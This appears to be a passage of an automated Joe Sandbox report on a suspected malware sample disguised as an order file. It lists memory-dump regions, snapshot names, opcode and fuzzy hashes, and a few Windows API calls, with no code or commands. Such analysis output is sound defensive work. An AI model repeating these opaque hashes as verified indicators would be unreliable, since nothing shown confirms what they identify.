                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 030B949D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 030BAB7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !
                                                              • API String ID: 0-2657877971
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: F
                                                              • API String ID: 0-1304234792
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %
                                                              • API String ID: 0-2567322570
                                                              • Opcode ID: 65954fc1cc98740592eaab7a8f3acd592399afa7441dbc4cce3439834cd01925
                                                              • Instruction ID: 9fd71352a8af62f7440a05d7f91714456fbaeb87f4c2223a6af2fd7b433069d6
                                                              • Opcode Fuzzy Hash: 65954fc1cc98740592eaab7a8f3acd592399afa7441dbc4cce3439834cd01925
                                                              • Instruction Fuzzy Hash: 33218B74901268CFDBA0CF68DD48BD9BBB2AF49305F1481DADA09A7361C7729E85CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410817108.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: t
                                                              • API String ID: 0-2238339752
                                                              • Opcode ID: 821e44af4904c0107f3f70d0f67344a2b3b15e9dc47c962df16d1aa6c6e688ff
                                                              • Instruction ID: 0ed14a64333ace9ccff1ed3411bf36a3cad13ce52c08e64a1b6d281ac872c8c3
                                                              • Opcode Fuzzy Hash: 821e44af4904c0107f3f70d0f67344a2b3b15e9dc47c962df16d1aa6c6e688ff
                                                              • Instruction Fuzzy Hash: B31126B492422ACFEB34DF18D888BA9B3B6BB85304F1052E5D45DA3640DB754E85CF11
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,
                                                              • API String ID: 0-3772416878
                                                              • Opcode ID: 060ae8a7dc780f6a2e4be324482c6f648e2aed2b2f33f829bfaabbdc7251bc00
                                                              • Instruction ID: 4ec742b1c87bc2b430514a9c179ebde6c2cdb848e344113d4ec530ab035ec830
                                                              • Opcode Fuzzy Hash: 060ae8a7dc780f6a2e4be324482c6f648e2aed2b2f33f829bfaabbdc7251bc00
                                                              • Instruction Fuzzy Hash: B011EE70901218CFEBA0DF18D9A4B9CB7B5BF09300F4082DAD509A72A1CB759E85CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 9
                                                              • API String ID: 0-2366072709
                                                              • Opcode ID: 32a30b297515140304fad6e1488b559a5a9810bb1250a28fca7fcc8785bbca3c
                                                              • Instruction ID: 35b985b17ec6f3f8743f6ea096f7ee796093c3ce0df584b1a19ff3a2179332e3
                                                              • Opcode Fuzzy Hash: 32a30b297515140304fad6e1488b559a5a9810bb1250a28fca7fcc8785bbca3c
                                                              • Instruction Fuzzy Hash: 3011CCB4A501188FCB64DF24C89479EBBF1EF4A311F4081EAD54AA7350DB305E80CF06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: >
                                                              • API String ID: 0-325317158
                                                              • Opcode ID: 0f108d269ca3648920d5ead14f38a12092d419b2d82d9eeed363523b6477c92f
                                                              • Instruction ID: df24151af64ed60de470be80e62f9cdb9d04bf6c5640a738b1fdea57d4bfc6db
                                                              • Opcode Fuzzy Hash: 0f108d269ca3648920d5ead14f38a12092d419b2d82d9eeed363523b6477c92f
                                                              • Instruction Fuzzy Hash: B4F07A74A012289FDBA1CF98D884B9CBBB1AB49300F104099A50DAB3A0C7716E81CF80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: >
                                                              • API String ID: 0-325317158
                                                              • Opcode ID: b1d41b5d52ac47fbd49278b137525cb9e06b57281aa8991fb5ae7964e87885d9
                                                              • Instruction ID: df24151af64ed60de470be80e62f9cdb9d04bf6c5640a738b1fdea57d4bfc6db
                                                              • Opcode Fuzzy Hash: b1d41b5d52ac47fbd49278b137525cb9e06b57281aa8991fb5ae7964e87885d9
                                                              • Instruction Fuzzy Hash: B4F07A74A012289FDBA1CF98D884B9CBBB1AB49300F104099A50DAB3A0C7716E81CF80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: L
                                                              • API String ID: 0-2909332022
                                                              • Opcode ID: 359bb5f639f9a47e3616fffc36326efef13f1600a565e43bb9dc984e6e8de364
                                                              • Instruction ID: a68990b9d1779ca8da5744bb8e2d40b40935af25f130174a2546541a3c9bfb95
                                                              • Opcode Fuzzy Hash: 359bb5f639f9a47e3616fffc36326efef13f1600a565e43bb9dc984e6e8de364
                                                              • Instruction Fuzzy Hash: 5FF0FAB8D152288FCB68CF25D9857D9BBB1BB98301F1081EAD549A3250DBB01EC0DF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6
                                                              • API String ID: 0-498629140
                                                              • Opcode ID: 1ce61eab976390a3b48265da4725ca535acbef3c4a50c4a0fc5eb6842ed388c9
                                                              • Instruction ID: f396e084d7c30e046aa19110f822259593335e97ff9414252b6b4671f7de0c2f
                                                              • Opcode Fuzzy Hash: 1ce61eab976390a3b48265da4725ca535acbef3c4a50c4a0fc5eb6842ed388c9
                                                              • Instruction Fuzzy Hash: 7BE0BD398062288FEB20CF20DA48BD8BBF1AF08304F0040DA8209A22A1C6345E85CF00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m
                                                              • API String ID: 0-3775001192
                                                              • Opcode ID: a084c79ec50fd44ed3a2a918e48093ca29badf781cb4db9492359e6c233604cb
                                                              • Instruction ID: a9fe5bb19daafd1e9ae30183916a5c2ccf616acda824782d5729f1545a00ea21
                                                              • Opcode Fuzzy Hash: a084c79ec50fd44ed3a2a918e48093ca29badf781cb4db9492359e6c233604cb
                                                              • Instruction Fuzzy Hash: 5FD05EB5A10328CFDB10DF64D44874A37B3FB84308F000284C209A7200CB344D948F5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c484a951d638daf6b2cb6e42f95620ddeb29e47d9e7ff7e7b6171c195dc78a3
                                                              • Instruction ID: d19e6bd1f4869c4dfc02f0c51530abe177bf809aa20a5b114d764b70d438e246
                                                              • Opcode Fuzzy Hash: 3c484a951d638daf6b2cb6e42f95620ddeb29e47d9e7ff7e7b6171c195dc78a3
                                                              • Instruction Fuzzy Hash: AB52D675E002288FDB64DF68C985BEDBBF6BB88300F1581D9E549A7351DA309E81CF61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409450802.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d60000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60219f21bbbcc3df7e8e6c35f27796e9b80f6877475d031be74dc137c7aa3eda
                                                              • Instruction ID: ba93417de167489b96102aebe9b4e45d8750d1556424349d98b9643115eb88ae
                                                              • Opcode Fuzzy Hash: 60219f21bbbcc3df7e8e6c35f27796e9b80f6877475d031be74dc137c7aa3eda
                                                              • Instruction Fuzzy Hash: C242F674E0421DCFDB94CFAAD854AAEB7B2FF49300F108019E916AB394D7749982CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cefaef2fafa34263e68bb524dd1edc40cac10ce550f13da0ecaa3ed85cf43090
                                                              • Instruction ID: 23b36a594f2fca95c67c9b53eece60f8257d391e2ae14c11abf6c19a9743fe7f
                                                              • Opcode Fuzzy Hash: cefaef2fafa34263e68bb524dd1edc40cac10ce550f13da0ecaa3ed85cf43090
                                                              • Instruction Fuzzy Hash: 50120335700605CFDB54EF28D894AAA77B2EF89714B2580A8E9069B3A1DB35EC41CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0fdebee66971d13913cd34120ffcfe1f363994f54e50f7e42e61a105f0afbf12
                                                              • Instruction ID: cd57d46544979d7f27b46852315dc1beef1e21c8e889c74bfd6769e620552080
                                                              • Opcode Fuzzy Hash: 0fdebee66971d13913cd34120ffcfe1f363994f54e50f7e42e61a105f0afbf12
                                                              • Instruction Fuzzy Hash: 40225E71E0022A8FDB55DFA5D854AAEBBF2FF48300F248115E812AB395DB749D81CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409450802.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d60000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b09426cf09c7e85cb4d9340b8af01eaddaaa25ff51c67e525d5c813af8d6fb5
                                                              • Instruction ID: 534676e7c968d34bd13e9b23f3e6b38a3116cb8744d9ffe2a463356e33725b28
                                                              • Opcode Fuzzy Hash: 7b09426cf09c7e85cb4d9340b8af01eaddaaa25ff51c67e525d5c813af8d6fb5
                                                              • Instruction Fuzzy Hash: F922C230D01258CFCF94DFA5C9546ADB7B2BF89301F208469E85AAB394DB359E89CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49869db82b00f4d04ac14391b4f84a717985a930dd421c5e484a727c8322cbb1
                                                              • Instruction ID: 5d9992ceae728359d6e7a11127b6dc27f7b9d373b6496fd5833b10b70a9107cb
                                                              • Opcode Fuzzy Hash: 49869db82b00f4d04ac14391b4f84a717985a930dd421c5e484a727c8322cbb1
                                                              • Instruction Fuzzy Hash: 70126D31A00215CFDBA4DFA9D844A6EB7F6FF88300F14852AD50A9B794DB35EC45CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0786d7fe55a5719a17393bad2d829fb4f702b14a3df83eee9924b97c08e2765c
                                                              • Instruction ID: 6879becf76384d657ee619e73b6d6e7f351c2a1887e348dda8d5b9e90e15648b
                                                              • Opcode Fuzzy Hash: 0786d7fe55a5719a17393bad2d829fb4f702b14a3df83eee9924b97c08e2765c
                                                              • Instruction Fuzzy Hash: 25120934A002298FDB94EF64CD94A9DB7B2BF89300F5185A8D54AAB395DF70ED85CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a4d81d8f75415c8c1bf374afc7873e140adb579026415daff5d018f3ad10ef6f
                                                              • Instruction ID: a309565127b651a3b24ee47497d6804fcb61f0470d78648c77548122d91d426a
                                                              • Opcode Fuzzy Hash: a4d81d8f75415c8c1bf374afc7873e140adb579026415daff5d018f3ad10ef6f
                                                              • Instruction Fuzzy Hash: ABF16534A00219DFDB45EF64D89499DBBB2FF89300F108569E806AB3A4DF74ED45CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f42f642eafae0edcdaaa4e32b9fece5319c00625103c2f9dd6092aec00778e9c
                                                              • Instruction ID: 39f59e6ebfca756dc35115230958f6c9b448a9a868c0b1181e395376aa37c764
                                                              • Opcode Fuzzy Hash: f42f642eafae0edcdaaa4e32b9fece5319c00625103c2f9dd6092aec00778e9c
                                                              • Instruction Fuzzy Hash: 9FF1D934B00218CFDB44EFA4D998A9DB7B2FF89301F158159E906AB3A5DB71EC42CB41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409450802.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6d60000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 57441595b2f3c661db31266590a99eba0fb149cbafe2a3781e51405753e9f2f5
                                                              • Instruction ID: 7d93841f5e0da46dded0ccfd6e02fbc4f5807fac9c70f8188aaeb5ebdd40944d
                                                              • Opcode Fuzzy Hash: 57441595b2f3c661db31266590a99eba0fb149cbafe2a3781e51405753e9f2f5
                                                              • Instruction Fuzzy Hash: CFF1E734D01218DFCB98EFA9E9946ACBBB2FF49305F20452EE416A7394DB315A85CF41
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54f6fa4ea16aa48d77b638744d24ad72c18994a7d3d192410b74b6ac889f0358
                                                              • Instruction ID: 3f85ec2377ea612ee20ff325feeb1e2b05b18504ff547a0d3d720632ff05689b
                                                              • Opcode Fuzzy Hash: 54f6fa4ea16aa48d77b638744d24ad72c18994a7d3d192410b74b6ac889f0358
                                                              • Instruction Fuzzy Hash: 20C1C231F047608FDBA58B28C45466ABBE2BF85310B19896DD48BCB791EBF4EC81C751
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e07d6bc5265b3d26e8b667b2c54ca135a5f8fecea11a230b886fba00f5fc8e36
                                                              • Instruction ID: bfb37b0036a2c0f7ef75d33a944cf728b61dacbd798f237a0134b0a669aad898
                                                              • Opcode Fuzzy Hash: e07d6bc5265b3d26e8b667b2c54ca135a5f8fecea11a230b886fba00f5fc8e36
                                                              • Instruction Fuzzy Hash: 2051F370E19248CFEB54DF98E4847AEBBF1FF89304F14806AD519AB266D7748985CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 408b0a96df23a489b8c7ab1e7eacb66c2a45c8df26d6e98d07d001d5ceaf41ae
                                                              • Instruction ID: 41601ef7582039e3c5f3d17513dcf35c2b4b5f49aca53731c2bdf8f22ec1a6cd
                                                              • Opcode Fuzzy Hash: 408b0a96df23a489b8c7ab1e7eacb66c2a45c8df26d6e98d07d001d5ceaf41ae
                                                              • Instruction Fuzzy Hash: B4510278E01218DFDB44EFAAD988AADBBF2FF88341F108029E916A3354DB745945DF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ca4c3ac5b0c6790386eeebbb89e2a5396bb3a66091b9320c75497400e8bafcb4
                                                              • Instruction ID: 1cd20bb16841f08b5d72a8d7ea4aa59cfa258895d80139cd567b41c52087c553
                                                              • Opcode Fuzzy Hash: ca4c3ac5b0c6790386eeebbb89e2a5396bb3a66091b9320c75497400e8bafcb4
                                                              • Instruction Fuzzy Hash: 37510278E01218DFDB44EFAAD988AADBBF2FF88341F108029E916A3354DB745945DF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ed61f85e3a630a959c839c364770c1da56865d0cf0d895278c6d0f36cb62b18
                                                              • Instruction ID: 7b7f98f5ce8ace37e36c242c593262c391d83264e831697fd47ff328692b3c62
                                                              • Opcode Fuzzy Hash: 8ed61f85e3a630a959c839c364770c1da56865d0cf0d895278c6d0f36cb62b18
                                                              • Instruction Fuzzy Hash: B5419935E00B549FCB61CF79C944A6EBBF2FF88300B188959E58697A50E7B0E904CF61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7679a8d2a968912ecc549ed9fc6ebdacf911c3da0e565e44d2e5ba1033fe542
                                                              • Instruction ID: 567e3871dc2a574f997d06fb17902d1d870618f47fee2eef2f97542b1bdec5d2
                                                              • Opcode Fuzzy Hash: d7679a8d2a968912ecc549ed9fc6ebdacf911c3da0e565e44d2e5ba1033fe542
                                                              • Instruction Fuzzy Hash: E2510074E05248CFDB44DF99E484B9EBBF1FF89304F10806AD519AB266D7748989CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0618df94052a104823c75815610c58be48abd8822484a4700d4b87c424f1ec39
                                                              • Instruction ID: 20a0bd712479f6439cb1d3f5531e650bed514726cb5225ad6ba03fd3209ad113
                                                              • Opcode Fuzzy Hash: 0618df94052a104823c75815610c58be48abd8822484a4700d4b87c424f1ec39
                                                              • Instruction Fuzzy Hash: A5419F35E01218EFCF44DB68DC54AEEBBB5FB88301F108065E802BB291DB359D45CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ed52a35edcb48811f2bf25d4421c6492434d917f37ba3b1e4faae482fdd048d1
                                                              • Instruction ID: 8b0e11ef84610b8157dbc6ad88b86e392ef4a41e88d6ea582e73662dfc93ad7f
                                                              • Opcode Fuzzy Hash: ed52a35edcb48811f2bf25d4421c6492434d917f37ba3b1e4faae482fdd048d1
                                                              • Instruction Fuzzy Hash: 0251F274E05248CFDB44DF99E484BAEBBF1FF89304F10816AD519A7266D7748989CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 954ecf1ffbc9a89207c9487c11ca7ea2a4ecbc93ace84c819c7e42431d2dbafa
                                                              • Instruction ID: 2d7cef63a8a6c96b064072d076ee4a11b5b000f8bdf0b8bb7598dfd6296607ec
                                                              • Opcode Fuzzy Hash: 954ecf1ffbc9a89207c9487c11ca7ea2a4ecbc93ace84c819c7e42431d2dbafa
                                                              • Instruction Fuzzy Hash: 0051E170E01218DFDB68DFA9D484AADBBB2BF89305F20812EE405AB360DB319945CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 10a98b10f76636ad1ed41ff1102096518efed670c668994319293bbb3d363a23
                                                              • Instruction ID: 36ddebca1ba3c64871c5f631347ff515124dfa389a0a0142d19386d0f47e0799
                                                              • Opcode Fuzzy Hash: 10a98b10f76636ad1ed41ff1102096518efed670c668994319293bbb3d363a23
                                                              • Instruction Fuzzy Hash: 85310436A101149FCB45CF68D888EA9BBB2FF49321B1680A9E6099B372D731ED55CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a34b82ffd244f36456c6e3bcd538d9b59d35d876305ebcdf9b4db73ea2d4fa6
                                                              • Instruction ID: 982cb893fca6abdc021172533be62db0e4ac707700a03161a32bc136ac026725
                                                              • Opcode Fuzzy Hash: 7a34b82ffd244f36456c6e3bcd538d9b59d35d876305ebcdf9b4db73ea2d4fa6
                                                              • Instruction Fuzzy Hash: 1431A3706003099FD751EB68E80479E7BEAEF89300F108569D549D7645EF719E058BD3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: faa68006ac7a063b2c4b5858b7626fb22980e83b4fe57d5590000d0284751a1c
                                                              • Instruction ID: b87c4712e647788365e837ed60458b1c1616ed240c313df227ff5b8bb09efa67
                                                              • Opcode Fuzzy Hash: faa68006ac7a063b2c4b5858b7626fb22980e83b4fe57d5590000d0284751a1c
                                                              • Instruction Fuzzy Hash: D9418871E002268FDB50CFA9D8446BEBBB1FB88354F00802AD946E7291E735E945CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94ddca224959c23f1bea4f2a271e79502d11271832e685ca8a02ef2abdda35ba
                                                              • Instruction ID: d3f7f6bd545138224324989b53380b0566360f50ce169b0199f87234756cbc6a
                                                              • Opcode Fuzzy Hash: 94ddca224959c23f1bea4f2a271e79502d11271832e685ca8a02ef2abdda35ba
                                                              • Instruction Fuzzy Hash: A631B135B002149FCF549FA5D844EAA7BB7FF88310B1540AAF6069B365DE31EC46CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
